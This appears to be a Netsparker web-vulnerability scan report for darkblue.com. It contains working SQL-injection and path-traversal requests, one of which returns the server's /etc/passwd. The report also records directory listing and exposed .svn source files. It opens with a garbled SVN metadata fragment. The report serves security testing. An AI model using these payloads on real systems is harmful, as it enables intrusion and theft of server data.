NoABNStatement.pdffile2010-01-12T00:34:16.000000Zab4a310d93bd1f443c4c99bb0968f6ec2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props advertisersdir affiliates.phpfile2010-01-12T00:34:16.000000Z0fd719981a44c097e61e52984826f17f2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props templatesdir banAdmin.htmfile2010-01-12T00:34:16.000000Zc0a8f310a75a9a1eacd0e2f563f9e77a2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props termsandconditions_adlt.htmfile2010-01-12T00:34:16.000000Z486e753a5f3c5c3f58de9cff7cab50312009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props codeGeneratorsdir bees.htmfile2010-01-12T00:34:16.000000Z77d42212a66091ef3f7535570947af582009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props mainadv.htmfile2010-01-12T00:34:16.000000Z770ac41f7d3ca0986b57b4a288bb9ee42009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props signup_step01_bt_LANDINGPAGE.htmfile2010-01-12T00:34:16.000000Zf274ce601cdc93e02b77f962d7bce7002009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props statsGraph.phpfile2010-01-12T00:34:16.000000Z077c9da490c331ec3791061d365892fa2009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props stat_supportdir controller_old.phpfile2010-01-12T00:34:16.000000Z3b2b18b2372aba524d33ee64f96ac2b52009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props whoweare.htmfile2010-01-12T00:34:16.000000Zb6deaa55438afd9bb171338468ccdf022009-11-01T23:42:49.704911Z38013a.clark@au.darkbluesea.comhas-props statdir
MySQL Database Identified

MySQL Database Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only, there is no direct impact arising from this issue.
- /index.htm

/index.htm CONFIRMED

http://darkblue.com/index.htm?info=1&section=forgotpassword

Request

POST /index.htm?info=1&section=forgotpassword HTTP/1.1
Referer: http://darkblue.com/index.htm?info=1&section=forgotpassword
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: darkblue.com
Content-Length: 208
Accept-Encoding: gzip, deflate

email=-1%27OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))--%20&sent=true&submit=3

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:15:02 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 1222
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/reset.css" /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body><div id="password-retrieval"><h2>Password Retrieval</h2><br /> <p>Could not find account with email as -1'OR 1=1 AND 1=(SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT CONCAT(CHAR(78),CHAR(69),CHAR(84),CHAR(83),CHAR(80),CHAR(65),CHAR(82),CHAR(75),CHAR(69),CHAR(82))),5,1)),0)=88),1,2))-- <p><a href="#" onClick="history.go(-1)">Try Again?</a><br></p> <br /> <p>You may now close this window.</p></div></body></html>
Directory Listing (Apache)

Directory Listing (Apache)

1 TOTAL
INFORMATION
The web server responded with a list of files located in the target directory.

Impact

An attacker can see the files located in the directory and could potentially access files which disclose sensitive information.

Actions to Take

  1. See the remedy for solution.
  2. Configure the web server to disallow directory listing requests.
  3. This can also be caused the web server products that don't have latest security patches. Ensure that all of the patches have been applied.

Remedy

Change your httpd.conf file. A secure configuration for the requested directory should be similar to the following one: 
<Directory /{YOUR DIRECTORY}>
	Options FollowSymLinks 
</Directory>
Remove the Indexes option from configuration. Do not forget to remove MultiViews as well.

External References

- /skins/lander/

/skins/lander/

http://darkblue.com/skins/lander/

Request

GET /skins/lander/ HTTP/1.1
Referer: http://darkblue.com/skins/lander/reset.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:11 GMT
Server: Apache/2.2.3 (CentOS)
Content-Length: 1427
Content-Type: text/html;charset=ISO-8859-1


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html> <head> <title>Index of /skins/lander</title> </head> <body><h1>Index of /skins/lander</h1><table><tr><th><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5"><hr></th></tr><tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td><td><a href="/skins/">Parent Directory</a></td><td>&nbsp;</td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="images/">images/</a></td><td align="right">31-Jan-2010 17:57 </td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="js/">js/</a></td><td align="right">31-Jan-2010 17:57 </td><td align="right"> - </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="reset.css">reset.css</a></td><td align="right">31-Jan-2010 17:57 </td><td align="right">710 </td></tr><tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="style.css">style.css</a></td><td align="right">03-Feb-2010 16:08 </td><td align="right">5.6K</td></tr><tr><th colspan="5"><hr></th></tr></table><address>Apache/2.2.3 (CentOS) Server at darkblue.com Port 80</address></body></html>
E-mail Address Disclosure

E-mail Address Disclosure

1 TOTAL
INFORMATION
Netsparker found e-mail addresses on the web site.

Impact

E-mail addresses discovered within the application can be used by both spam email engines and also brute force tools. Furthermore valid email addresses may lead to social engineering attacks .

Remedy

Use generic email addresses such as contact@ or info@ for general communications, remove user/people specific e-mail addresses from the web site, should this be required use submission forms for this purpose.

External References

- /index.htm

/index.htm

http://darkblue.com/index.htm?info=1&section=privacypolicy

Found E-mails

privacy@darkbluesea.com

Request

GET /index.htm?info=1&section=privacypolicy HTTP/1.1
Referer: http://darkblue.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:12:11 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 18207


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body><div id="content"> <div id="contentframe"> <div id="contentheader"> <a href="../index.htm"><img src="../images/btn_home.gif" align="right"></a><img src="../images/hd_privacy.gif"></a> </div> <div id="contentmain"> <div id="mainbody"> <p> <strong>Privacy Policy</strong> </p><h3>DARK BLUE SEA - PRIVACY POLICY</h3> <p>This Privacy Policy explains why and how we collect certain personal information from our customers and the visitors to our websites, and what we do with that information.</p> <p>The Dark Blue Sea group of companies is part of the Photon Group and offers an exciting range of online products and services including domain name registration, website hosting, domain monetization, domain name resale, expiring and deleted domain name services, reseller services and search engine services.</p> <p>The Dark Blue Sea group comprises a number of companies that includes:</p> <ul> <li>Dark Blue Sea Pty Ltd ABN 47 091 509 796</li> <li>Fabulous.com Pty Ltd ABN 64 094 218 443 (operates the business Fabulous Domains)</li> <li>Fabulous Parking Pty Ltd ABN 16 094 225 091</li> <li>Fabulous.com.au Pty Ltd ABN 34 139 626 994 (trading as Drop.com.au)</li> <li>Roar.com Pty Ltd ABN 99 094 225 064</li> <li>Pageseeker.com Pty Ltd ABN 45 090 513 849</li> <li>Darkblue.com Pty Ltd ABN 14 094 225 082</li> <li>Yexa.com Pty Ltd ABN 12 094 225 073</li> <li>Domain8 Pty Ltd ABN 79 135 424 878</li> <li>Yexa.com.au Pty Ltd ABN 84 137 606 172</li> <li>Whois Privacy Services Pty Ltd ABN 65 133 058 741</li> </ul><h4>ABOUT THIS PRIVACY POLICY</h4> <p>This Privacy Policy has been drafted to comply with the National Privacy Principles set out in the <i>Australian Privacy Act 1988 (Cth)</i>. More information about the Privacy Act is available on the Australian Privacy Commissioner's website at <a href="http://www.privacy.gov.au">http://www.privacy.gov.au</a>.</p><h4>WHY WE NEED TO COLLECT PERSONAL INFORMATION</h4> <p>Personal information is any information that identifies you or by which your identity can be reasonably determined.</p> <p>The collection, use and disclosure of personal information is essential to enable us to conduct our business of delivering online products and services to our customers and website visitors. For example most of our products and services require some form of registration or subscription, while others require a payment to be made. Contact details of our customers and website visitors may also be required from time to time to notify them of competition prizes they may have won. </p> <p>Some of the personal information we collect, including that obtained from our online enquiry/feedback facilities, is used to help us develop and improve the quality of our products and services, which in turn, provides our customers and website visitors with a more satisfying and enjoyable online experience.</p> <p>Without collecting and making use of your personal information, we may not be able to provide our online products and services to you.</p><h4>WHAT WE DO WITH YOUR PERSONAL INFORMATION</h4> <p>We use personal information that we collect to conduct our business of delivering online products and services and to continually improve our relationship with you.</p> <p>In order to do this, we share your personal information with our related companies.</p> <p>Personal information may be used to enable us to send you online promotional material on our range of products and services. You may at any time notify us that you do not wish to receive this material via the unsubscribe facility accompanying the material. Once you have notified us, we will not send you any further promotional material. </p><h4>HOW WE COLLECT INFORMATION</h4> <p><b>Personal Information provided to us</b></p> <p>We collect and store personal information that is voluntarily provided by our customers as part of doing business with us. Such information may include a customer's full name, date of birth, addresses (including home, postal and email address) and telephone numbers. We also collect and securely store customer's payment details such as their credit card details (where necessary).</p> <p>We collect this personal information and make use of these details to provide you with our products and services and to better manage our relationship with you.</p> <p><b>Website activity, cookies and related technology</b></p> <p>We provide products and services via a number of different websites. When you view one of our websites, our web server records anonymous information such as the time and date the website is viewed and the web pages/URL's requested. This information assists us to improve the structure of our websites and monitor their performance.<br />We also allow third parties with whom we have entered contractual arrangements ("Advertising Providers") to serve advertising on our websites.<br />We make use of cookies and iframes on our websites and permit Advertising Providers to place and read cookies on end users' browsers. These Advertising Providers may use web beacons or similar technologies to collect information in the course of advertisements being served on our websites.</p> <p>Cookies are pieces of information that a website transfers to your hard drive for record-keeping purposes. The browser stores the information, and sends the information back to the server each time you request a webpage from the server. The use of cookies is an industry standard, utilized by the majority of website operators.</p> <p>Most browsers are initially set up to accept cookies. You can reset your browser to refuse all cookies or indicate when a cookie is being sent. However, some parts of our websites, or the products and services provided through our websites, may not function properly or may be considerably slower if you do not enable cookies on your Internet browser.<br />The National Advertising Initiative ("NAI") offers an opt-out tool (located at <a href="http://www.networkadvertising.org/managin/opt_out.asp">http://www.networkadvertising.org/managin/opt_out.asp</a>) for the purpose of allowing consumers to "opt-out" of the behavioural advertising delivered by its member companies. Some of the third parties with whom we have entered into contractual arrangements are members of NAI.<br />We may have iframes embedded on our websites and may enter into contractual arrangements with third parties so that they may analyse your online behaviour. These iframes allow for the collection of non-personally identifiable information about your website visits.</p> <p><b>IP Addresses</b></p> <p>When you access our websites, our website servers register the type of web browsers that you are using and your IP address.</p> <p>We collect IP addresses for the purposes of system administration, to report aggregate traffic information to our customers, fraud detection and to generally audit the use of our websites. When you request pages from our websites, our servers may log your IP address.</p> <p>We do not normally link IP addresses to any personal information, which means that your session will be logged, but you otherwise remain anonymous.</p> <p>We can and will use your IP address to identify you when it is necessary to enforce compliance with our terms of service or to protect the integrity of our services and websites, as well as to protect our interests and those of our other customers.</p> <p>Some services provided by us, such as certain message boards, may display IP addresses along with the message poster's name and message. Please review each service prior to use and only use those services if you are comfortable with their methods of collection and disclosure of personal information.</p><h4>WHEN WE DISCLOSE PERSONAL INFORMATION</h4> <p>We take all reasonable steps to protect the personal information we hold from misuse and loss and from unauthorized access, modification or disclosure.</p> <p>We may disclose your personal information where you have consented to us doing so. This consent may be express (eg. in writing or verbal) or implied from your conduct. There may however be times where we are required to disclose personal information without your consent eg. when it is required or authorized by law.</p> <p>Personal information that you provide to us may be shared among our related companies. Our related companies are required to keep such information private and confidential and otherwise deal with such personal information strictly in accordance with this Privacy Policy.</p> <p>In order for us to conduct our business, it is necessary to disclose personal information to third parties. We may provide your personal information to third parties with whom we have contracted to provide administrative or other services, including to our affiliated website operators. We will ensure that these third parties are either bound by the Australian Privacy Act or subject to an equivalent law of another jurisdiction.</p> <p>When you utilize our domain name registration services, we provide your personal information to the registry operator for the relevant top level domain name for the purpose of inclusion in their registry database and the WHOIS service as well as to a third party providing registrar data escrow services (as required by our registrar accreditation agreement with the Internet Corporation for Assigned Names and Numbers ("ICANN")). The WHOIS service allows Internet users to query a domain name to find out the identity and contact details of the registrant. The public WHOIS service is a standard feature of domain name systems around the world. Please see auDA's WHOIS policy at <a href="http://www.auda.org.au/whois-policy">http://www.auda.org.au/whois-policy</a> which sets out auDA's guidelines on the collection, disclosure and use of WHOIS data. Please refer to the relevant TLD/ccTLD authority for specific WHOIS data collection policies. We are unable to provide our domain registration services to you without providing your personal information to these parties.</p><h4>TRANSBORDER FLOW OF PERSONAL INFORMATION</h4> <p>We are in the business of delivering online products and services. The Internet has no boundaries and as such we deal with international organizations and companies such as ICANN, registry operators and other service providers. We reasonably believe that these parties are subject to a law, binding scheme or contract which effectively upholds principles of fair handling of the information that are substantially similar to the National Privacy Principles. Without the transfer overseas to these entities, we will be unable to provide our online products and services to you.</p><h4>EPP SHARING ARRANGEMENTS</h4> <p>Fabulous.com.au Pty Ltd, has with the consent of .au Domain Administration Limited, the Australian Domain Name Administrator ("auDA"), entered into an EPP sharing arrangement with Netstart Pty Ltd ACN 111 018 154, an auDA accredited domain name registrar. "EPP" means the connection which the .au registry operator allows registrars to have to the domain name registry. Via the EPP, it is possible for Fabulous.com.au Pty Ltd, Domain8 Pty Ltd and Yexa.com.au Pty Ltd (formerly Domain Candy Pty Ltd) to have access to the registrant information of domain names managed by Netstart Pty Ltd. For this reason, agreements have been signed to protect registrant privacy and whois integrity.</p><h4>PROTECTING KIDS PRIVACY</h4><p>We are committed to complying with the provisions of the <i>Children's Online Privacy Protection Act of 1998</i> (United States) and its rules and regulations. We encourage parents and guardians to spend time online with their children and to participate in the activities offered on our websites. </p> <p><b>Notice to Kids</b></p> <p>If you are under 13 years of age, we must get your parent or guardian's permission before we can collect any personal information about you, such as your name, date of birth and your hobbies. </p> <p>You are allowed to give us either your email address, or the email address of your parent or guardian, so that we can contact them and ask for their permission to collect your personal information. </p> <p>No other information about you should be given to us, or one of our websites, until your parent or guardian has given you permission. </p> <p><b>Notice to Parents</b></p> <p>Before your child can access most of the interactive products and services we provide, they are required to provide us with certain information about themselves, for example, their name, date of birth and contact details, so that we can register them as a member. </p> <p>However, before we collect this personal information from your child, they are required to provide us with an e-mail address at which you, their parent or guardian can be contacted, so that we can obtain your consent. </p> <p>Although users under 13 years of age may be allowed to participate in some contests and promotions, if they win, notification and prizes are sent to the parents or guardians at the address specified in the initial registration process. Publication of contest winners' names, ages, or images for individuals under 13 require parental or guardian consent. </p> <p>Subject to the below exemptions, the personal information that we collect from your child will be subject to and dealt with in accordance with the terms of this Privacy Policy. </p> <p>No information collected from visitors under 13 years of age is used for any promotional purposes whatsoever, unless expressly stated during the collection of this information or during registration for contests or promotions (and in that case, the information collected is used only for the specific contest or promotion). </p> <p>We do not allow visitors under 13 years of age to be listed in our member directory or to receive direct promotional communications from us.</p><h4>LINKS TO OTHER WEBSITES</h4> <p>You should be aware that on our affiliated websites, there are links to third party websites. If you "click" on a banner advertisement, a search result or another type of link contained on one of our sites, the "click" may result in you leaving our site and your browser being redirected to a website owned and controlled by a third party. </p> <p>In this case, we recommend that you refer to the privacy policy of the websites you visit. We have no control over, and hence accept no responsibility for, the content of these sites or the actions of the operators in relation to the collection of personal information of users of these sites. </p> <p>Whilst we make every reasonable effort to protect the privacy of your personal information, we cannot guarantee the security of any information you disclose online and you do so at your own risk. </p> <p>You should keep in mind that whenever you give out personal information online, there is a risk that the information can be intercepted and used by third parties without our knowledge. We are in no way responsible or liable for the misuse of personal information obtained in this manner. </p><h4>ACCESS AND ACCURACY OF PERSONAL INFORMATION</h4> <p>You may request access to any personal information that we hold about you. All requests will be handled as quickly as possible, and we will endeavour to process any request for access within 30 days of its receipt.</p> <p>We may refuse access to personal information in certain circumstances such as where the information relates to anticipated legal proceedings with you, where denying access is required or authorized by law, where providing access would be likely to prejudice an investigation by an enforcement body or where the request for access is regarded as frivolous or vexatious. If we deny you access to personal information or refuse to correct personal information, we will give you reasons as to why.</p><h4>ENSURING PERSONAL INFORMATION IS UP-TO-DATE</h4> <p>It is very important that the personal information that we hold about you is complete, accurate and up-to-date. Please notify us immediately if there has been any change to your personal information.</p> <p>If you register a domain name with us, you will be provided with a unique registry key and/or username/password which may be used to access your personal information as well as to amend/update that personal information.</p><h4>PRIVACY COMPLAINTS</h4> <p>If you believe that we have not protected your personal information in accordance with this Privacy Policy, you can lodge a complaint by:</p> <ul> <li>Emailing: privacy@darkbluesea.com</li> <li>Telephoning: +61 7 3007 0070</li> <li>Faxing: +61 7 3007 0001</li> <li>Writing to us at:<br /> PO Box 757<br /> Fortitude Valley QLD 4006</li> </ul> <p>If you are not satisfied with the result of your complaint to us, you can refer your complaint to the Australian Privacy Commissioner as follows:</p> <ul> <li>Telephoning: +61 1300 363 992</li> <li>Writing to:<br /> Privacy Commissioner<br /> GPO Box 5218<br /> Sydney NSW 2001</li> </ul><h4>YOUR ACCEPTANCE OF THESE TERMS</h4> <p>By using this website or our affiliated websites, you consent to us collecting, using and disclosing your personal information in accordance with this Privacy Policy (as amended from time to time).</p> </div> </div> </..
[Possible] Internal Path Leakage (*nix)

[Possible] Internal Path Leakage (*nix)

3 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact however this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /index.htm

/index.htm

http://darkblue.com/index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%00

Identified Internal Path(s)

  • /bin/bash
  • /sbin/nologin
  • /var/adm:/sbin/nologin
  • /var/spool/lpd:/sbin/nologin
  • /bin/sync
  • /sbin/shutdown
  • /sbin/halt
  • /var/spool/mail:/sbin/nologin
  • /etc/news:
  • /var/spool/uucp:/sbin/nologin
  • /usr/games:/sbin/nologin
  • /var/gopher:/sbin/nologin
  • /var/ftp:/sbin/nologin
  • /var/lib/rpm:/sbin/nologin
  • /var/crash:/bin/bash
  • /var/empty/sshd:/sbin/nologin
  • /var/spool/mqueue:/sbin/nologin
  • /var/lib/nfs:/sbin/nologin
  • /var/arpwatch:/sbin/nologin
  • /etc/X11/fs:/sbin/nologin

Request

GET /index.htm?info=1&section=../../../../../CANTBEHERE/../../../../../../etc/passwd%00 HTTP/1.1
Referer: http://darkblue.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:14:07 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Content-Length: 2597
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>DarkBlue Affiliate Network</title> <meta name="keywords" content="Affiliate network, affiliate program, dark blue, affiliate software, merchants and advertisers, affiliates, internet advertising, commissions, webmaster" /> <meta name="description" content="Darkblue.com the number one affiliate program and advertiser campaign network." /> <link rel="stylesheet" type="text/css" href="skins/lander/style.css" /> <link rel="shortcut icon" type="image/x-icon" href="skins/lander/images/darkblue.ico"></head><body>root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinnetdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bashnscd:x:28:28:NSCD Daemon:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologinpegasus:x:100:500:tog-pegasus OpenPegasus WBEM/CIM services:/var/lib/Pegasus:/sbin/nologinnamed:x:25:25:Named:/var/named:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashdbs:x:500:100::/home/dbs:/bin/bashmonit:x:101:101:monit daemon:/var/lib/monit:/bin/shdistcache:x:94:94:Distcache:/:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinrbackup:x:501:501::/home/rbackup:/bin/sh</body></html>
- /.svn/text-base/xbTreeWidgetStatic.js.svn-base

/.svn/text-base/xbTreeWidgetStatic.js.svn-base

http://darkblue.com/.svn/text-base/xbTreeWidgetStatic.js.svn-base

Identified Internal Path(s)

/lib/js/license/mpl-tri-license.txt

Request

GET /.svn/text-base/xbTreeWidgetStatic.js.svn-base HTTP/1.1
Referer: http://darkblue.com/.svn/text-base/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:24:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 12 Jan 2010 00:33:38 GMT
ETag: "688a28-159b-ce0e1c80"
Accept-Ranges: bytes
Content-Length: 5531
Content-Type: application/x-javascript


/* * $Log: xbTreeWidgetStatic.js,v $ * Revision 1.3 2002/10/30 12:28:43 kuen * *** empty log message *** * * Revision 1.2 2002/10/30 12:25:06 kuen * *** empty log message *** * * Revision 1.1 2002/10/29 12:02:05 kuen * *** empty log message *** * * Revision 1.6 2002/07/22 14:19:42 bc6ix * fix license path * * Revision 1.5 2002/07/07 08:23:08 bc6ix * fix line endings * * Revision 1.4 2002/05/14 16:52:53 bc6ix * use CVS Log for revision history * *//* ***** BEGIN LICENSE BLOCK ***** * Licensed under Version: MPL 1.1/GPL 2.0/LGPL 2.1 * Full Terms at /lib/js/license/mpl-tri-license.txt * * Software distributed under the License is distributed on an "AS IS" basis, * WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License * for the specific language governing rights and limitations under the * License. * * The Original Code is Netscape code. * * The Initial Developer of the Original Code is * Netscape Corporation. * Portions created by the Initial Developer are Copyright (C) 2001 * the Initial Developer. All Rights Reserved. * * Contributor(s): Bob Clary <bclary@netscape.com> * * ***** END LICENSE BLOCK ***** */xbDEBUG.on = false;xbTreeWidgetStatic._id = 0;xbTreeWidgetStatic._hash = new Object();xbTreeWidgetStatic._dynamic = (document.documentElement && typeof(document.documentElement.innerHTML) == 'string');function xbTreeWidgetStatic(handles, labels, classprefix ){ this.id = 'treewidgetid' + xbTreeWidgetStatic._id++; xbTreeWidgetStatic._hash[this.id] = this; this.handles = handles; this.labels = labels; this.classprefix = classprefix ? classprefix : 'treewidget'; this.children = new Array();}xbTreeWidgetStatic.prototype.appendChild =function xbTreeNodeAppendChild(child){ if (child) this.children[this.children.length] = child; return child;}if (document.getElementById || document.all){ xbTreeWidgetStatic.prototype.toHTML = function xbTreeWidgetStaticToHTMLDOMIE(level) { var i; var html = ''; if (typeof(level) == 'undefined') level = 0; html += '<div class="' + this.classprefix + 'container">\n'; html += '<div ID="' + this.id + '" class="' + this.classprefix + 'handle" onclick="xbTreeWidgetStaticToggleHandle(this)">'; if (xbTreeWidgetStatic._dynamic && level > 0 && this.children.length > 0) { html += this.handles.closed; html += this.labels.closed; } else { html += this.handles.open; html += this.labels.open; } html += '<\/div>\n'; if (this.children.length) { html += '<div class="' + this.classprefix + 'children" '; if (xbTreeWidgetStatic._dynamic && level > 0) { html += 'style="display:none;">'; } else { html += 'style="display:block;">'; } for (i = 0; i < this.children.length; i++) { html += this.children[i].toHTML(level + 1); } html += '<\/div>\n'; } html += '<\/div>\n'; //alert(html); return html; };}else { xbTreeWidgetStatic.prototype.toHTML = function xbTreeWidgeToHTMLLegacy(depth) { var i; var html = ''; if (typeof(depth) == 'undefined') { depth = 0; } html += '<table>\n'; html += '<tr>\n'; html += '<td>\n'; if (document.layers) html += '<ilayer visibility="hidden">\n'; else html += '<span style="visibility: hidden">\n'; for (i = 0; i < depth; i++) { html += '..'; } if (document.layers) html += '<\/ilayer>\n'; else html += '<\/span>\n'; html += this.handles.open + this.labels.open; for (i = 0; i < this.children.length; i++) { html += this.children[i].toHTML(depth+1); } html += '<\/td>\n'; html += '<\/tr>\n'; html += '<\/table>\n'; return html; };}function xbGetNextElement(node){ var next; for (next = node.nextSibling; next; next = next.nextSibling) { if (next.nodeType == 1) return next; } return null;}function xbTreeWidgetStaticToggleHandle(handlediv){ if (!handlediv) return false; var widget; var next = xbGetNextElement(handlediv); if (next) { switch(next.style.display) { case '': case 'block': next.style.display = 'none'; if (typeof(handlediv.innerHTML) == 'string') { widget = xbTreeWidgetStatic._hash[handlediv.id]; handlediv.innerHTML = widget.handles.closed + widget.labels.closed; } break; case 'none': next.style.display = 'block'; if (typeof(handlediv.innerHTML) == 'string') { widget = xbTreeWidgetStatic._hash[handlediv.id]; handlediv.innerHTML = widget.handles.open + widget.labels.open; } break; default: return false; } } return true;}function xbCreateTreeWidgetStaticFromObject(getChildren, getHandles, getLabels, obj, classprefix){ xbDEBUG.dump('xbCreateStaticTreeWidgetFromObject()'); var i; var children; var root = null; var handles = getHandles(obj, classprefix); var labels = getLabels(obj, classprefix); children = getChildren(obj); root = new xbTreeWidgetStatic(handles, labels, classprefix); for (i = 0; i < children.length; i++) { var child = children[i]; root.appendChild( xbCreateTreeWidgetStaticFromObject(getChildren, getHandles, getLabels, child, classprefix) ); } return root;}
- /.svn/text-base/xbDebug.js.svn-base

/.svn/text-base/xbDebug.js.svn-base

http://darkblue.com/.svn/text-base/xbDebug.js.svn-base

Identified Internal Path(s)

/lib/js/license/mpl-tri-license.txt

Request

GET /.svn/text-base/xbDebug.js.svn-base HTTP/1.1
Referer: http://darkblue.com/.svn/text-base/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: darkblue.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 04 Jan 2011 17:24:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 12 Jan 2010 00:33:41 GMT
ETag: "689015-1f8e-ce3be340"
Accept-Ranges: bytes
Content-Length: 8078
Content-Type: application/x-javascript


